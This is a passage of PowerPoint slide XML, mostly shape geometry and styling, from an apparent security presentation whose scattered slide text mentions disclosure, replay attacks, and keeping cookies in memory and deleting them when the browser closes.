                    <a:pt x="3186071" y="2754167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3142989" y="2775680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3099549" y="2796210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3055766" y="2815760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3011661" y="2834334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2967249" y="2851934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2922550" y="2868562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2877581" y="2884222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2832359" y="2898916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2786903" y="2912648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2741230" y="2925419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2695359" y="2937233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2649306" y="2948092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2603091" y="2958000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2556729" y="2966959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2510241" y="2974971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2463642" y="2982041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2416952" y="2988169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2370187" y="2993360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2323366" y="2997616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2276506" y="3000939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2229626" y="3003333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2182743" y="3004801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2135874" y="3005344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089039" y="3004967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2042254" y="3003671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1995537" y="3001460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1948906" y="2998336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1902379" y="2994302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1855974" y="2989361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1809709" y="2983515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1763601" y="2976768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1717668" y="2969123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1671928" y="2960581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1626399" y="2951146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1581099" y="2940821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1536045" y="2929608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1491255" y="2917510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1446747" y="2904530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1402539" y="2890671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1358649" y="2875936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1315094" y="2860326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1271893" y="2843846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1229062" y="2826498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1186621" y="2808284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1144586" y="2789208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1102976" y="2769273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1061808" y="2748480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021100" y="2726833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="980870" y="2704335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="941136" y="2680988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="901916" y="2656795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="863227" y="2631760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="825087" y="2605884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787514" y="2579170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750526" y="2551622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="714140" y="2523243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678376" y="2494034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643249" y="2463998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="608778" y="2433140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="574981" y="2401460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541876" y="2368963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509481" y="2335651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477812" y="2301526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446889" y="2266592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416729" y="2230851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="387350" y="2194306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357066" y="2154659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328015" y="2114509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300196" y="2073877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273610" y="2032783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248255" y="1991249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224133" y="1949295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201243" y="1906942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179585" y="1864211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159160" y="1821123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139967" y="1777699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122006" y="1733959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105278" y="1689926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89783" y="1645619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75521" y="1601059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62491" y="1556268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50693" y="1511266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40129" y="1466074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30797" y="1420714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22699" y="1375205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15833" y="1329570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10200" y="1283828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5800" y="1238001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2634" y="1192109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700" y="1146174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1100216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532" y="1054257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2298" y="1008317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5298" y="962417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9531" y="916578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14997" y="870821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21696" y="825167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29629" y="779637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38796" y="734251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49196" y="689031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60830" y="643997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73698" y="599171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87800" y="554573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103135" y="510224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119704" y="466145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137507" y="422357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156544" y="378881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176815" y="335737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198320" y="292948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221059" y="250533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245032" y="208513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270240" y="166910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296681" y="125744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324357" y="85037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353268" y="44808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383413" y="5080"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9524">
              <a:solidFill>
                <a:srgbClr val="9CAFB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675876" y="4347971"/>
              <a:ext cx="1091565" cy="792480"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1091565" h="792479">
                  <a:moveTo>
                    <a:pt x="972947" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="118237" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72223" y="10386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34639" y="38703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9294" y="80688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="132079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="660400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9294" y="711791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34639" y="753776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72223" y="782093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118237" y="792479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="972947" y="792479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018960" y="782093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056544" y="753776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1081889" y="711791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1091183" y="660400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1091183" y="132079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1081889" y="80688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056544" y="38703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018960" y="10386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="972947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0063988" y="4551426"/>
            <a:ext cx="31496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35" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>05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675876" y="6160008"/>
            <a:ext cx="1091565" cy="792480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1091565" h="792479">
                <a:moveTo>
                  <a:pt x="972947" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="118237" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72223" y="10386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34639" y="38703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9294" y="80688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="132080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="660400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9294" y="711791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34639" y="753776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72223" y="782093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118237" y="792480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="972947" y="792480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1018960" y="782093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1056544" y="753776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1081889" y="711791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1091183" y="660400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1091183" y="132080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1081889" y="80688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1056544" y="38703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1018960" y="10386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="972947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0063988" y="6363080"/>
            <a:ext cx="31496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35" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>04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891271" y="7034783"/>
            <a:ext cx="1092835" cy="792480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1092834" h="792479">
                <a:moveTo>
                  <a:pt x="974344" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="118363" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72276" y="10386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34655" y="38703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9296" y="80688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="132080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="660400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9296" y="711791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34655" y="753776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72276" y="782093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118363" y="792480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974344" y="792480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1020431" y="782093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1058052" y="753776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1083411" y="711791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1092707" y="660400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1092707" y="132080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1083411" y="80688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1058052" y="38703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1020431" y="10386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974344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8280018" y="7238238"/>
            <a:ext cx="31496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35" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>03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18632" y="6160008"/>
            <a:ext cx="1092835" cy="792480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1092834" h="792479">
                <a:moveTo>
                  <a:pt x="974343" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="118363" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72276" y="10386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34655" y="38703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9296" y="80688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="132080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="660400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9296" y="711791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34655" y="753776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72276" y="782093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118363" y="792480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974343" y="792480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1020431" y="782093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1058052" y="753776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1083411" y="711791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1092708" y="660400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1092708" y="132080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1083411" y="80688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1058052" y="38703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1020431" y="10386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974343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206997" y="6363080"/>
            <a:ext cx="31496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35" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>02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03391" y="4347971"/>
            <a:ext cx="1092835" cy="792480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1092834" h="792479">
                <a:moveTo>
                  <a:pt x="974343" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="118363" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72276" y="10386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34655" y="38703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9296" y="80688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="132079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="660400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9296" y="711791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34655" y="753776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72276" y="782093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118363" y="792479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974343" y="792479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1020431" y="782093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1058052" y="753776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1083411" y="711791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1092708" y="660400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1092708" y="132079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1083411" y="80688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1058052" y="38703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1020431" y="10386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974343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192773" y="4551426"/>
            <a:ext cx="31496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35" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>01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145393" y="4498975"/>
            <a:ext cx="137668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Disclosure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155171" y="6373748"/>
            <a:ext cx="106172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Security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00770" y="8042249"/>
            <a:ext cx="62039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Ta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g</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="155">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>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368546" y="6373748"/>
            <a:ext cx="9086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Search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129152" y="4149369"/>
            <a:ext cx="2398395" cy="11823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200" spc="10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Identify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de-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duplicate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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>files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 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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metadata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18831" y="4608576"/>
            <a:ext cx="1868424" cy="186842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98056" y="306451"/>
            <a:ext cx="265811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30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Replay</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-13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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attacks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63514" y="1933193"/>
            <a:ext cx="51333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ual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tw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type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co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kies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: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63640" y="760476"/>
            <a:ext cx="3707891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8570214" y="4435602"/>
            <a:ext cx="6162040" cy="2525395"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6162040" h="2525395">
                <a:moveTo>
                  <a:pt x="0" y="420877"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2832" y="371801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11117" y="324385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24540" y="278946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42784" y="235801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65534" y="195265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92473" y="157654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123285" y="123285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157654" y="92473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195265" y="65534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235801" y="42784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278946" y="24540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324385" y="11117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="371801" y="2832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="420877" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5740653" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5789730" y="2832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5837146" y="11117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5882585" y="24540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5925730" y="42784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5966266" y="65534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6003877" y="92473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6038246" y="123285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6069058" y="157654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6095997" y="195265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6118747" y="235801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6136991" y="278946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6150414" y="324385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158699" y="371801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="420877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="2104390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158699" y="2153466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6150414" y="2200882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6136991" y="2246321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6118747" y="2289466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6095997" y="2330002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6069058" y="2367613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6038246" y="2401982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6003877" y="2432794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5966266" y="2459733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5925730" y="2482483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5882585" y="2500727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5837146" y="2514150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5789730" y="2522435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5740653" y="2525268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="420877" y="2525268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="371801" y="2522435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324385" y="2514150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278946" y="2500727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235801" y="2482483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195265" y="2459733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157654" y="2432794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123285" y="2401982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92473" y="2367613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65534" y="2330002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42784" y="2289466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24540" y="2246321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11117" y="2200882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2832" y="2153466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2104390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="420877"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="E3B36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026143" y="5264048"/>
            <a:ext cx="5295265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37260" marR="5080" indent="-925194">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Sto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memo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delet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w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 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bro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w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stanc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closed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557004" y="3913632"/>
            <a:ext cx="4410710" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4410709" h="984885">
                <a:moveTo>
                  <a:pt x="4246372" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164084" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
